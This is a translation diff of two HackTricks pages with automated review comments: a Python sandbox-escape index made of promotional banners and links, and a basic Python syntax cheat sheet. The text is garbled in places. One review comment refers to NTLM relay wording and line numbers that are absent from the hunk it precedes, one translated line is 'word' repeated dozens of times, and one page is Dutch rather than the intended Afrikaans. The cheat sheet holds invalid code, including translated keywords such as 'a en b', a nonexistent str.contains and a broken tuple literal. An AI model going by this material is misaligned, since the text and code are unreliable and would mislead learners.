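Review bot: "hasie" at L49080 ("die hasie of die verifikasie") means a small rabbit, not a cryptographic hash; keep "hash" as the loan term, as the untranslated English line above it does. "NTLM-oordrag" (L49072, L49080, L49091, L49094) is also a problem: "oordrag" is a generic transfer, while "NTLM relay" is the name of a specific attack that readers will search for, so keep "NTLM relay" and at most translate the surrounding noun ("NTLM relay-aanvalle"). Two pre-existing issues in the lines this hunk touches are worth fixing while it is open: the link anchor `#ntml-relay-attack` (L49085 and L49091) spells "ntml", which must match the slug of the target heading on the spoofing page or the link silently lands at the top of that page; and the footer at L49136 still names "@carlospolopm" while the URL points at hacktricks_live, which the translated line has carried over unchanged.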
@ -1,53 +1,53 @@
|
|||
# Python Sandbox Escape & Pyscript
|
||||
# Python Sandbox Ontsnapping & Pyscript
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Andere manieren om HackTricks te ondersteunen:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* Als je je **bedrijf wilt adverteren in HackTricks** of **HackTricks wilt downloaden in PDF-formaat**, bekijk dan de [**ABONNEMENTSPAKKETTEN**](https://github.com/sponsors/carlospolop)!
|
||||
* Koop de [**officiële PEASS & HackTricks merchandise**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), onze collectie exclusieve [**NFT's**](https://opensea.io/collection/the-peass-family)
|
||||
* **Doe mee aan de** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of de [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel je hacktrucs door PR's in te dienen bij de** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
Get Access Today:
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om eenvoudig workflows te bouwen en te automatiseren met behulp van 's werelds meest geavanceerde communitytools.\
|
||||
Krijg vandaag nog toegang:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
||||
**Interesting pages to check:**
|
||||
**Interessante pagina's om te bekijken:**
|
||||
|
||||
* [**Pyscript hacking tricks**](pyscript.md)
|
||||
* [**Python deserializations**](../../pentesting-web/deserialization/#python)
|
||||
* [**Tricks to bypass python sandboxes**](bypass-python-sandboxes/)
|
||||
* [**Basic python web requests syntax**](web-requests.md)
|
||||
* [**Basic python syntax and libraries**](basic-python.md)
|
||||
* [**Pyscript hacktrucs**](pyscript.md)
|
||||
* [**Python deserialisaties**](../../pentesting-web/deserialization/#python)
|
||||
* [**Trucs om Python-sandboxes te omzeilen**](bypass-python-sandboxes/)
|
||||
* [**Basis syntaxis voor Python-webverzoeken**](web-requests.md)
|
||||
* [**Basis syntaxis en bibliotheken voor Python**](basic-python.md)
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
Get Access Today:
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om eenvoudig workflows te bouwen en te automatiseren met behulp van 's werelds meest geavanceerde communitytools.\
|
||||
Krijg vandaag nog toegang:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Andere manieren om HackTricks te ondersteunen:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* Als je je **bedrijf wilt adverteren in HackTricks** of **HackTricks wilt downloaden in PDF-formaat**, bekijk dan de [**ABONNEMENTSPAKKETTEN**](https://github.com/sponsors/carlospolop)!
|
||||
* Koop de [**officiële PEASS & HackTricks merchandise**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), onze collectie exclusieve [**NFT's**](https://opensea.io/collection/the-peass-family)
|
||||
* **Doe mee aan de** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of de [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel je hacktrucs door PR's in te dienen bij de** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
|
||||
|
||||
</details>
|
||||
|
|
|
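Review bot: this file has been translated into Dutch, not Afrikaans, so it does not belong in a commit titled "Translated to Afrikaans". "Andere manieren om HackTricks te ondersteunen" (L49177, L49329), "Als je je bedrijf wilt adverteren in HackTricks" (L49197, L49349), "Doe mee aan de" (L49206, L49358), "Krijg vandaag nog toegang" (L49236, L49303) and "Interessante pagina's om te bekijken" (L49249) are all Dutch; the Afrikaans renderings used in the other files of this same commit are "Ander maniere om HackTricks te ondersteun" and "Sluit aan by die". The result is also internally mixed, since the title at L49156, "Python Sandbox Ontsnapping & Pyscript", is Afrikaans while the body is Dutch. Redo this file with the Afrikaans target, or drop it from this commit.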
@ -1,37 +1,37 @@
|
|||
# Basic Python
|
||||
# Basiese Python
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
|
||||
</details>
|
||||
|
||||
## Python Basics
|
||||
## Python Basiese Beginsels
|
||||
|
||||
### Useful information
|
||||
### Nuttige inligting
|
||||
|
||||
list(xrange()) == range() --> In python3 range is the xrange of python2 (it is not a list but a generator)\
|
||||
The difference between a Tuple and a List is that the position of a value in a tuple gives it meaning but the lists are just ordered values. Tuples have structures but lists have an order.
|
||||
list(xrange()) == range() --> In python3 is range die xrange van python2 (dit is nie 'n lys nie, maar 'n generator)\
|
||||
Die verskil tussen 'n Tuple en 'n Lys is dat die posisie van 'n waarde in 'n tuple betekenis daaraan gee, maar die lyse is net geordende waardes. Tuples het strukture, maar lyse het 'n volgorde.
|
||||
|
||||
### Main operations
|
||||
### Hoofhandelinge
|
||||
|
||||
To raise a number you use: 3\*\*2 (not 3^2)\
|
||||
If you do 2/3 it returns 1 because you are dividing two ints (integers). If you want decimals you should divide floats (2.0/3.0).\
|
||||
Om 'n getal te verhoog, gebruik jy: 3\*\*2 (nie 3^2 nie)\
|
||||
As jy 2/3 doen, gee dit 1 terug omdat jy twee ints (heeltalle) deel. As jy desimale wil hê, moet jy floats deel (2.0/3.0).\
|
||||
i >= j\
|
||||
i <= j\
|
||||
i == j\
|
||||
i != j\
|
||||
a and b\
|
||||
a or b\
|
||||
not a\
|
||||
a en b\
|
||||
a of b\
|
||||
nie a\
|
||||
float(a)\
|
||||
int(a)\
|
||||
str(d)\
|
||||
|
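Review bot: L49512 to L49518 translate Python keywords inside what is a syntax cheat sheet: `a en b`, `a of b` and `nie a` replace `a and b`, `a or b` and `not a`, and none of the translated forms is valid Python (`a en b` is a SyntaxError). Code tokens must stay as they are; only the surrounding prose should be translated. Two factual points carried over from the English are also wrong and could be corrected in the same pass: L49488 repeats that `2/3` "gee dit 1 terug", but integer division of 2 by 3 gives 0 in Python 2 and `2/3` gives 0.666... in Python 3 (floor division there is `2//3`); and L49463 calls Python 3's `range` a generator, when it is a lazy `range` sequence object (it supports `len()` and indexing, which a generator does not). Minor wording: the plural of "lys" is "lyste", not "lyse" (L49466).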
@ -46,76 +46,74 @@ isinstance(1, int) = True\
|
|||
"abcdef".contains("abc") = True\
|
||||
"abc\n".strip() = "abc"\
|
||||
"apbc".replace("p","") = "abc"\
|
||||
dir(str) = List of all the available methods\
|
||||
help(str) = Definition of the class str\
|
||||
dir(str) = Lys van al die beskikbare metodes\
|
||||
help(str) = Definisie van die klas str\
|
||||
"a".upper() = "A"\
|
||||
"A".lower() = "a"\
|
||||
"abc".capitalize() = "Abc"\
|
||||
sum(\[1,2,3]) = 6\
|
||||
sorted(\[1,43,5,3,21,4])
|
||||
|
||||
**Join chars**\
|
||||
**Voeg karakters bymekaar**\
|
||||
3 \* ’a’ = ‘aaa’\
|
||||
‘a’ + ‘b’ = ‘ab’\
|
||||
‘a’ + str(3) = ‘a3’\
|
||||
\[1,2,3]+\[4,5]=\[1,2,3,4,5]
|
||||
|
||||
**Parts of a list**\
|
||||
**Dele van 'n lys**\
|
||||
‘abc’\[0] = ‘a’\
|
||||
'abc’\[-1] = ‘c’\
|
||||
'abc’\[1:3] = ‘bc’ from \[1] to \[2]\
|
||||
'abc’\[1:3] = ‘bc’ vanaf \[1] tot \[2]\
|
||||
"qwertyuiop"\[:-1] = 'qwertyuio'
|
||||
|
||||
**Comments**\
|
||||
\# One line comment\
|
||||
**Kommentaar**\
|
||||
\# Eenreëelkommentaar\
|
||||
"""\
|
||||
Several lines comment\
|
||||
Another one\
|
||||
Verskeie reëls kommentaar\
|
||||
Nog een\
|
||||
"""
|
||||
|
||||
**Loops**
|
||||
|
||||
**Lusse**
|
||||
```
|
||||
if a:
|
||||
#somethig
|
||||
#somethig
|
||||
elif b:
|
||||
#something
|
||||
#something
|
||||
else:
|
||||
#something
|
||||
#something
|
||||
|
||||
while(a):
|
||||
#comething
|
||||
#comething
|
||||
|
||||
for i in range(0,100):
|
||||
#something from 0 to 99
|
||||
#something from 0 to 99
|
||||
|
||||
for letter in "hola":
|
||||
#something with a letter in "hola"
|
||||
#something with a letter in "hola"
|
||||
```
|
||||
|
||||
### Tuples
|
||||
|
||||
t1 = (1,'2,'three')\
|
||||
t2 = (5,6)\
|
||||
t3 = t1 + t2 = (1, '2', 'three', 5, 6)\
|
||||
(4,) = Singelton\
|
||||
d = () empty tuple\
|
||||
d += (4,) --> Adding into a tuple\
|
||||
CANT! --> t1\[1] == 'New value'\
|
||||
list(t2) = \[5,6] --> From tuple to list
|
||||
d = () leë tuple\
|
||||
d += (4,) --> Voeg by 'n tuple\
|
||||
KAN NIE! --> t1\[1] == 'Nuwe waarde'\
|
||||
list(t2) = \[5,6] --> Van tuple na lys
|
||||
|
||||
### List (array)
|
||||
### Lys (array)
|
||||
|
||||
d = \[] empty\
|
||||
d = \[] leë\
|
||||
a = \[1,2,3]\
|
||||
b = \[4,5]\
|
||||
a + b = \[1,2,3,4,5]\
|
||||
b.append(6) = \[4,5,6]\
|
||||
tuple(a) = (1,2,3) --> From list to tuple
|
||||
tuple(a) = (1,2,3) --> Van lys na tuple
|
||||
|
||||
### Dictionary
|
||||
### Woordeskat
|
||||
|
||||
d = {} empty\
|
||||
d = {} leë\
|
||||
monthNumbers={1:’Jan’, 2: ‘feb’,’feb’:2}—> monthNumbers ->{1:’Jan’, 2: ‘feb’,’feb’:2}\
|
||||
monthNumbers\[1] = ‘Jan’\
|
||||
monthNumbers\[‘feb’] = 2\
|
||||
|
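Review bot: the heading "### Woordeskat" at L49803 translates "Dictionary" as vocabulary; the section is about Python's `dict`, so keep "Dictionary (dict)" or use "woordeboek". Inside the loops block (L49658 to L49716) every comment line is marked as changed with identical visible content, which means the translation has altered indentation inside a fenced Python block; indentation is syntax in Python, so this file needs a check that only comment lines moved. Three errors in the unchanged context of this hunk are worth fixing while it is being edited: `"abcdef".contains("abc") = True` at L49534 (`str` has no `contains` method; the idiom is `"abc" in "abcdef"`), `t1 = (1,'2,'three')` at L49728 (missing quote; the result on L49734 shows the intended `(1,'2','three')`), and "Singelton" at L49737 for "Singleton".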
@ -124,218 +122,198 @@ monthNumbers.values() = \[‘Jan’,’feb’,2]\
|
|||
keys = \[k for k in monthNumbers]\
|
||||
a={'9':9}\
|
||||
monthNumbers.update(a) = {'9':9, 1:’Jan’, 2: ‘feb’,’feb’:2}\
|
||||
mN = monthNumbers.copy() #Independent copy\
|
||||
monthNumbers.get('key',0) #Check if key exists, Return value of monthNumbers\["key"] or 0 if it does not exists
|
||||
mN = monthNumbers.copy() #Onafhanklike kopie\
|
||||
monthNumbers.get('key',0) #Kyk of sleutel bestaan, Gee waarde van monthNumbers\["key"] of 0 as dit nie bestaan nie
|
||||
|
||||
### Set
|
||||
### Stel
|
||||
|
||||
In sets there are no repetitions\
|
||||
In stelle is daar geen herhalings nie\
|
||||
myset = set(\['a', 'b']) = {'a', 'b'}\
|
||||
myset.add('c') = {'a', 'b', 'c'}\
|
||||
myset.add('a') = {'a', 'b', 'c'} #No repetitions\
|
||||
myset.add('a') = {'a', 'b', 'c'} #Geen herhalings\
|
||||
myset.update(\[1,2,3]) = set(\['a', 1, 2, 'b', 'c', 3])\
|
||||
myset.discard(10) #If present, remove it, if not, nothing\
|
||||
myset.remove(10) #If present remove it, if not, rise exception\
|
||||
myset.discard(10) #As teenwoordig, verwyder dit, as nie, niks\
|
||||
myset.remove(10) #As teenwoordig, verwyder dit, as nie, gooi 'n uitsondering\
|
||||
myset2 = set(\[1, 2, 3, 4])\
|
||||
myset.union(myset2) #Values it myset OR myset2\
|
||||
myset.intersection(myset2) #Values in myset AND myset2\
|
||||
myset.difference(myset2) #Values in myset but not in myset2\
|
||||
myset.symmetric\_difference(myset2) #Values that are not in myset AND myset2 (not in both)\
|
||||
myset.pop() #Get the first element of the set and remove it\
|
||||
myset.intersection\_update(myset2) #myset = Elements in both myset and myset2\
|
||||
myset.difference\_update(myset2) #myset = Elements in myset but not in myset2\
|
||||
myset.symmetric\_difference\_update(myset2) #myset = Elements that are not in both
|
||||
myset.union(myset2) #Waardes in myset OF myset2\
|
||||
myset.intersection(myset2) #Waardes in myset EN myset2\
|
||||
myset.difference(myset2) #Waardes in myset maar nie in myset2\
|
||||
myset.symmetric\_difference(myset2) #Waardes wat nie in myset EN myset2 is (nie in beide nie)\
|
||||
myset.pop() #Kry die eerste element van die stel en verwyder dit\
|
||||
myset.intersection\_update(myset2) #myset = Elemente in beide myset en myset2\
|
||||
myset.difference\_update(myset2) #myset = Elemente in myset maar nie in myset2\
|
||||
myset.symmetric\_difference\_update(myset2) #myset = Elemente wat nie in beide is nie
|
||||
|
||||
### Classes
|
||||
|
||||
The method in \_\_It\_\_ will be the one used by sort to compare if an object of this class is bigger than other
|
||||
### Klasse
|
||||
|
||||
Die metode in \_\_It\_\_ sal gebruik word deur sort om te vergelyk of 'n objek van hierdie klas groter is as 'n ander
|
||||
```python
|
||||
class Person(name):
|
||||
def __init__(self,name):
|
||||
self.name= name
|
||||
self.lastName = name.split(‘ ‘)[-1]
|
||||
self.birthday = None
|
||||
def __It__(self, other):
|
||||
if self.lastName == other.lastName:
|
||||
return self.name < other.name
|
||||
return self.lastName < other.lastName #Return True if the lastname is smaller
|
||||
def __init__(self,name):
|
||||
self.name= name
|
||||
self.lastName = name.split(‘ ‘)[-1]
|
||||
self.birthday = None
|
||||
def __It__(self, other):
|
||||
if self.lastName == other.lastName:
|
||||
return self.name < other.name
|
||||
return self.lastName < other.lastName #Return True if the lastname is smaller
|
||||
|
||||
def setBirthday(self, month, day. year):
|
||||
self.birthday = date tame.date(year,month,day)
|
||||
def getAge(self):
|
||||
return (date time.date.today() - self.birthday).days
|
||||
def setBirthday(self, month, day. year):
|
||||
self.birthday = date tame.date(year,month,day)
|
||||
def getAge(self):
|
||||
return (date time.date.today() - self.birthday).days
|
||||
|
||||
|
||||
class MITPerson(Person):
|
||||
nextIdNum = 0 # Attribute of the Class
|
||||
def __init__(self, name):
|
||||
Person.__init__(self,name)
|
||||
self.idNum = MITPerson.nextIdNum —> Accedemos al atributo de la clase
|
||||
MITPerson.nextIdNum += 1 #Attribute of the class +1
|
||||
nextIdNum = 0 # Attribute of the Class
|
||||
def __init__(self, name):
|
||||
Person.__init__(self,name)
|
||||
self.idNum = MITPerson.nextIdNum —> Accedemos al atributo de la clase
|
||||
MITPerson.nextIdNum += 1 #Attribute of the class +1
|
||||
|
||||
def __it__(self, other):
|
||||
return self.idNum < other.idNum
|
||||
def __it__(self, other):
|
||||
return self.idNum < other.idNum
|
||||
```
|
||||
### map, zip, filter, lambda, sorted en eenregelige oplossingen
|
||||
|
||||
### map, zip, filter, lambda, sorted and one-liners
|
||||
|
||||
**Map** is like: \[f(x) for x in iterable] --> map(tutple,\[a,b]) = \[(1,2,3),(4,5)]\
|
||||
**Map** is soos: \[f(x) vir x in iterable] --> map(tutple,\[a,b]) = \[(1,2,3),(4,5)]\
|
||||
m = map(lambda x: x % 3 == 0, \[1, 2, 3, 4, 5, 6, 7, 8, 9]) --> \[False, False, True, False, False, True, False, False, True]
|
||||
|
||||
**zip** stops when the shorter of foo or bar stops:
|
||||
|
||||
**zip** stop wanneer die kortste van foo of bar stop:
|
||||
```
|
||||
for f, b in zip(foo, bar):
|
||||
print(f, b)
|
||||
print(f, b)
|
||||
```
|
||||
|
||||
**Lambda** is used to define a function\
|
||||
(lambda x,y: x+y)(5,3) = 8 --> Use lambda as simple **function**\
|
||||
**sorted**(range(-5,6), key=lambda x: x\*\* 2) = \[0, -1, 1, -2, 2, -3, 3, -4, 4, -5, 5] --> Use lambda to sort a list\
|
||||
m = **filter**(lambda x: x % 3 == 0, \[1, 2, 3, 4, 5, 6, 7, 8, 9]) = \[3, 6, 9] --> Use lambda to filter\
|
||||
**reduce** (lambda x,y: x\*y, \[1,2,3,4]) = 24
|
||||
|
||||
**Lambda** word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word
|
||||
```
|
||||
def make_adder(n):
|
||||
return lambda x: x+n
|
||||
return lambda x: x+n
|
||||
plus3 = make_adder(3)
|
||||
plus3(4) = 7 # 3 + 4 = 7
|
||||
|
||||
class Car:
|
||||
crash = lambda self: print('Boom!')
|
||||
crash = lambda self: print('Boom!')
|
||||
my_car = Car(); my_car.crash() = 'Boom!'
|
||||
```
|
||||
mult1 = \[x vir x in \[1, 2, 3, 4, 5, 6, 7, 8, 9] as x%3 == 0 ]
|
||||
|
||||
mult1 = \[x for x in \[1, 2, 3, 4, 5, 6, 7, 8, 9] if x%3 == 0 ]
|
||||
|
||||
### Exceptions
|
||||
|
||||
### Uitsonderings
|
||||
```
|
||||
def divide(x,y):
|
||||
try:
|
||||
result = x/y
|
||||
except ZeroDivisionError, e:
|
||||
print “division by zero!” + str(e)
|
||||
except TypeError:
|
||||
divide(int(x),int(y))
|
||||
else:
|
||||
print “result i”, result
|
||||
finally
|
||||
print “executing finally clause in any case”
|
||||
def divide(x,y):
|
||||
try:
|
||||
result = x/y
|
||||
except ZeroDivisionError, e:
|
||||
print “division by zero!” + str(e)
|
||||
except TypeError:
|
||||
divide(int(x),int(y))
|
||||
else:
|
||||
print “result i”, result
|
||||
finally
|
||||
print “executing finally clause in any case”
|
||||
```
|
||||
|
||||
### Assert()
|
||||
|
||||
If the condition is false the string will be printed in the screen
|
||||
|
||||
As die voorwaarde vals is, sal die string op die skerm gedruk word.
|
||||
```
|
||||
def avg(grades, weights):
|
||||
assert not len(grades) == 0, 'no grades data'
|
||||
assert len(grades) == 'wrong number grades'
|
||||
assert not len(grades) == 0, 'no grades data'
|
||||
assert len(grades) == 'wrong number grades'
|
||||
```
|
||||
### Opwekkers, opbrengs
|
||||
|
||||
### Generators, yield
|
||||
|
||||
A generator, instead of returning something, it "yields" something. When you access it, it will "return" the first value generated, then, you can access it again and it will return the next value generated. So, all the values are not generated at the same time and a lot of memory could be saved using this instead of a list with all the values.
|
||||
|
||||
'n Opwekker, in plaas van om iets terug te gee, "lewer" iets op. Wanneer jy dit toegang gee, sal dit die eerste gegenereerde waarde "teruggee", dan kan jy dit weer toegang gee en dit sal die volgende gegenereerde waarde teruggee. So, al die waardes word nie op dieselfde tyd gegenereer nie en baie geheue kan bespaar word deur dit te gebruik in plaas van 'n lys met al die waardes.
|
||||
```
|
||||
def myGen(n):
|
||||
yield n
|
||||
yield n + 1
|
||||
yield n
|
||||
yield n + 1
|
||||
```
|
||||
|
||||
g = myGen(6) --> 6\
|
||||
next(g) --> 7\
|
||||
next(g) --> Error
|
||||
next(g) --> Fout
|
||||
|
||||
### Regular Expresions
|
||||
### Reëlmatige Uitdrukkings
|
||||
|
||||
import re\
|
||||
re.search("\w","hola").group() = "h"\
|
||||
re.findall("\w","hola") = \['h', 'o', 'l', 'a']\
|
||||
re.findall("\w+(la)","hola caracola") = \['la', 'la']
|
||||
|
||||
**Special meanings:**\
|
||||
. --> Everything\
|
||||
**Spesiale betekenisse:**\
|
||||
. --> Alles\
|
||||
\w --> \[a-zA-Z0-9\_]\
|
||||
\d --> Number\
|
||||
\s --> WhiteSpace char\[ \n\r\t\f]\
|
||||
\S --> Non-whitespace char\
|
||||
^ --> Starts with\
|
||||
$ --> Ends with\
|
||||
\+ --> One or more\
|
||||
\* --> 0 or more\
|
||||
? --> 0 or 1 occurrences
|
||||
\d --> Nommer\
|
||||
\s --> Spasie karakter\[ \n\r\t\f]\
|
||||
\S --> Nie-spasie karakter\
|
||||
^ --> Begin met\
|
||||
$ --> Eindig met\
|
||||
\+ --> Een of meer\
|
||||
\* --> 0 of meer\
|
||||
? --> 0 of 1 voorkomste
|
||||
|
||||
**Options:**\
|
||||
**Opsies:**\
|
||||
re.search(pat,str,re.IGNORECASE)\
|
||||
IGNORECASE\
|
||||
DOTALL --> Allow dot to match newline\
|
||||
MULTILINE --> Allow ^ and $ to match in different lines
|
||||
DOTALL --> Laat punt om nuwe lyn te pas\
|
||||
MULTILINE --> Laat ^ en $ om in verskillende lyne te pas
|
||||
|
||||
re.findall("<.\*>", "\<b>foo\</b>and\<i>so on\</i>") = \['\<b>foo\</b>and\<i>so on\</i>']\
|
||||
re.findall("<.\*?>", "\<b>foo\</b>and\<i>so on\</i>") = \['\<b>', '\</b>', '\<i>', '\</i>']
|
||||
|
||||
IterTools\
|
||||
**product**\
|
||||
from **itertools** import product --> Generates combinations between 1 or more lists, perhaps repeating values, cartesian product (distributive property)\
|
||||
from **itertools** import product --> Genereer kombinasies tussen 1 of meer lysse, dalk herhalende waardes, kartesiese produk (verdelings eienskap)\
|
||||
print list(**product**(\[1,2,3],\[3,4])) = \[(1, 3), (1, 4), (2, 3), (2, 4), (3, 3), (3, 4)]\
|
||||
print list(**product**(\[1,2,3],repeat = 2)) = \[(1, 1), (1, 2), (1, 3), (2, 1), (2, 2), (2, 3), (3, 1), (3, 2), (3, 3)]
|
||||
|
||||
**permutations**\
|
||||
from **itertools** import **permutations** --> Generates combinations of all characters in every position\
|
||||
print list(permutations(\['1','2','3'])) = \[('1', '2', '3'), ('1', '3', '2'), ('2', '1', '3'),... Every posible combination\
|
||||
print(list(permutations('123',2))) = \[('1', '2'), ('1', '3'), ('2', '1'), ('2', '3'), ('3', '1'), ('3', '2')] Every possible combination of length 2
|
||||
from **itertools** import **permutations** --> Genereer kombinasies van alle karakters op elke posisie\
|
||||
print list(permutations(\['1','2','3'])) = \[('1', '2', '3'), ('1', '3', '2'), ('2', '1', '3'),... Elke moontlike kombinasie\
|
||||
print(list(permutations('123',2))) = \[('1', '2'), ('1', '3'), ('2', '1'), ('2', '3'), ('3', '1'), ('3', '2')] Elke moontlike kombinasie van lengte 2
|
||||
|
||||
**combinations**\
|
||||
from itertools import **combinations** --> Generates all possible combinations without repeating characters (if "ab" existing, doesn't generate "ba")\
|
||||
from itertools import **combinations** --> Genereer alle moontlike kombinasies sonder om karakters te herhaal (as "ab" bestaan, genereer dit nie "ba")\
|
||||
print(list(**combinations**('123',2))) --> \[('1', '2'), ('1', '3'), ('2', '3')]
|
||||
|
||||
**combinations\_with\_replacement**\
|
||||
from itertools import **combinations\_with\_replacement** --> Generates all possible combinations from the char onwards(for example, the 3rd is mixed from the 3rd onwards but not with the 2nd o first)\
|
||||
from itertools import **combinations\_with\_replacement** --> Genereer alle moontlike kombinasies vanaf die karakter voort (byvoorbeeld, die 3de is gemeng vanaf die 3de voort maar nie met die 2de of eerste nie)\
|
||||
print(list(**combinations\_with\_replacement**('1133',2))) = \[('1', '1'), ('1', '1'), ('1', '3'), ('1', '3'), ('1', '1'), ('1', '3'), ('1', '3'), ('3', '3'), ('3', '3'), ('3', '3')]
|
||||
|
||||
### Decorators
|
||||
|
||||
Decorator that size the time that a function needs to be executed (from [here](https://towardsdatascience.com/decorating-functions-in-python-619cbbe82c74)):
|
||||
### Versierders
|
||||
|
||||
Versierder wat die tyd meet wat 'n funksie neem om uitgevoer te word (vanaf [hier](https://towardsdatascience.com/decorating-functions-in-python-619cbbe82c74)):
|
||||
```python
|
||||
from functools import wraps
|
||||
import time
|
||||
def timeme(func):
|
||||
@wraps(func)
|
||||
def wrapper(*args, **kwargs):
|
||||
print("Let's call our decorated function")
|
||||
start = time.time()
|
||||
result = func(*args, **kwargs)
|
||||
